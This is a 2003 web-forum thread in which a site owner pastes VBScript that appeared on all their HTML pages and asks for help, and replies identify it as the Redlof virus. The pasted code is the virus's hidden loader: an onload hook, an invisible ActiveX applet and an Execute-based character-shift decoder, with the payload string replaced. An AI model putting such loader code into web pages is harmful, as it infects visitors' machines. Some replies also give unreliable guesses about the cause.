help on suspicious html code..
hello there..
i'm just wondering how the hell this code appeared on all of the html files in my website in my local drive..
the code appears after the REAL code of the html file.
<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "virus removed"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 2"&vbCrLf&"KeyArr(1) = 8"&vbCrLf&"KeyArr(2) = 8"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML>
i was just thinking if this was done by my HTML editor..
i'm using Dreamweaver MX and there was one time when i opened my site, Dreamweaver displayed several error messages (javascript errors) even before opening..
hope you could help me on this..
as a temporary solution, i have already manually erased all the "extra" scripts on my pages and i'm now editing my pages on notepad..
i also have my site running on Yahoo Geocities..
i also use redirection from CJB.net..
is it possible that either one these two put the code on the html files for advertisment purposes?
by the way, the address is http://www.geocities.com/ustchem2003
or http://ustchem2003.cjb.net (with redirection)
thanks for the help guys..
Renegade posted this at 10:37 — 31st August 2003.
He has: 3,022 posts
Joined: Oct 2002
I don't think CJB.net put anything on your site for they only do redirecting but its quite possible that Geocities did.
druagord posted this at 21:30 — 2nd September 2003.
He has: 335 posts
Joined: May 2003
I am no specialist but this look like some malicious code. I suggest you make sure a worm didn't get a old of your pc
jowp posted this at 06:54 — 3rd September 2003.
They have: 6 posts
Joined: Aug 2003
as far as i know, i don't think my pc's been attacked by such things..
well, there's this very annoying virus that makes a hidden copies of desktop.ini and folder.htt in almost every folder of my drive.. do you think this would have caused the code??
tuffy posted this at 15:45 — 3rd September 2003.
They have: 39 posts
Joined: Jul 2002
Hi,
If you have one virus, you may have others. Get rid of them. Try an online virus scanner if you don't have a virus protection program.
Make sure you are ftping in the correct format. If you open your file in any other editor, notepad, word, etc, this may also sometimes cause similar problems.
Hope this helps.
Leah | Idologic.com
Reseller, Dedicated, and Co-Lo Solutions
Vincent Puglia posted this at 23:46 — 4th September 2003.
They have: 634 posts
Joined: Dec 1999
Hi,
On the non-paranoid level: Was the page originally on the net? Did you upload and then download it, not necessarily during the same session?
the reason I ask: once or twice when uploading pages to my site I identified them as the wrong type in the ftp agent. The result was half text, half code.
Vinny
Where the world once stood
the blades of grass cut me still
m3rajk posted this at 16:45 — 5th September 2003.
They have: 461 posts
Joined: Jul 2003
i have a question, what is it about this particular thread that had my virus scanner catch a malicious script upon it's loading.
i've checked. it is JUST this thread (mcafee virus scan 7.0)
name: VBS/Redlof@M
POSIX. because a stable os that doesn't have memory leaks and isn't buggy is always good.
necrotic posted this at 16:56 — 6th September 2003.
He has: 296 posts
Joined: May 2002
Because of the code above. Its most likely the virus that McAfee is finding.
Renegade posted this at 01:20 — 7th September 2003.
He has: 3,022 posts
Joined: Oct 2002
Yes you do have a virus, its called MS Windows, it does that.
MS Word does that too with the default.dot file, check your hard drive for it.
jammin posted this at 05:32 — 7th September 2003.
They have: 222 posts
Joined: Sep 2002
yup its a virus, and norton had a field day when i opened this post.
go here for more info on it. seems annoying.
and if you dont have antivirus software then go to this site to scan for free. I have to warn you though, it may take a while on slower internet speeds.
good luck getting rid of the virus, and when you do get rid of the virus be sure to tell anyone you may have e-mailed that they too may be infected, since this virus is spread by e-mail.
anyone can do any amount of work provided it isnt the work they are supposed to be doing.
Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.